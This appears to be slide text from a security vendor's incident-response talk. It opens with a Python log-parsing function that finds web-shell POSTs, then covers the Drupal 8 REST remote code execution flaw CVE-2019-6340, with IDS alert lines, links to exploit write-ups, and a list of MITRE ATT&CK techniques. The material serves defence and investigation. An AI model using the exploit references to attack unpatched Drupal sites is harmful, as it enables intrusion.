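def webshell_interactions(lines: List[str], path: str = "/connect.php") -> List[Tuple[str, str, str]]:
    """(ip, day, time) of POSTs to the shell whose referer is the shell page itself."""
    hits = []
    for r in filter(None, map(parse, lines)):
        if r["method"] == "POST" and r["path"] == path and r["referer"].endswith(path):
            hits.append((r["ip"], r["day"], r["time"]))
    return hits
```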

CVE-2019-6340

Exploiting Drupal8's REST RCE: https://www.ambionics.io/blog/drupal8-rce
REST Module Remote Code Execution (Exploit Drupal8's REST RCE): https://www.exploit-db.com/exploits/46459
Open PT ESC ruleset: https://github.com/ptresearch/AttackDetection/blob/master/CVE-2019-6340/cve-2019-6340.rules

03/27/2019-21:32:06.083219 [**] [1:10003494:2] TOOLS [PTsecurity] PHP Object Deserialization RCE POP Chain (Guzzle/RCE1) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -> 192.70.197.230:80

03/27/2019-21:32:06.083219 [**] [1:10004555:3] ATTACK [PTsecurity] Arbitrary PHP RCE in Drupal 8 < 8.5.11,8.6.10 (CVE-2019-6340) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -> 192.70.197.230:80

Bitly | URL Shortener: https://bitly.com/2UbQmhT+

ATT&CK Matrix for Enterprise: https://attack.mitre.org/

Techniques by tactic:

Initial Access: Exploit Public-Facing Application
Execution: Command-Line Interface, PowerShell, Regsvr32, Scripting, Service Execution
Persistence: Registry Run Keys / Startup Folder, Web Shell
Privilege Escalation: Web Shell
Defense Evasion: Clear Command History, Deobfuscate/Decode Files or Information, File Deletion, File Permissions Modification, Hidden Files and Directories, Masquerading, Network Share Connection Removal, Obfuscated Files or Information, DLL Side-Loading, Scripting, Timestomp
Credential Access: Credential Dumping, Password Filter DLL
Discovery: Account Discovery, File and Directory Discovery, Network Share Discovery, Network Sniffing, Password Policy Discovery, Permission Groups Discovery, Process Discovery, Query Registry, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery
Lateral Movement: Pass the Hash, Remote Desktop Protocol, Remote File Copy, Windows Admin Shares
Collection: Clipboard Data, Input Capture, Screen Capture, Video Capture
Exfiltration: Data Compressed
Command and Control: Commonly Used Port, Connection Proxy, Data Encoding, Data Obfuscation, Multilayer Encryption, Remote Access Tools, Remote File Copy, Standard Application Layer Protocol, Standard Cryptographic Protocol
Impact: Data Destruction, Disk Content Wipe, Stored Data Manipulation

Analysis: timeline

Analysis: results

• Investigating in breadth and in depth,

• Performing both dynamic and static analysis,

• Storing traffic,

• Decrypting traffic,

• Drawing logical connections between the data,

• Identifying other attack vectors,

• Finding the initial vector,

• Correlating the artifacts found,

• Filling in the time gaps,

• Understanding the logic of the actions

Questions

Useful links

PT ESC Threat Intelligence blog: ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/

PT ESC Incident Response Alert: ptsecurity.com/ru-ru/services/esc/

Calypso APT: studying a new group attacking government institutions: ptsecurity.com/upload/corporate/ww-en/analytics/calypso-apt-2019-eng.pdf

Operation TaskMasters: cyberespionage in the era of the digital economy: ptsecurity.com/upload/corporate/ww-en/analytics/Operation-Taskmasters-2019-eng.pdf

[email protected]

ptsecurity.com

Thank you for your attention!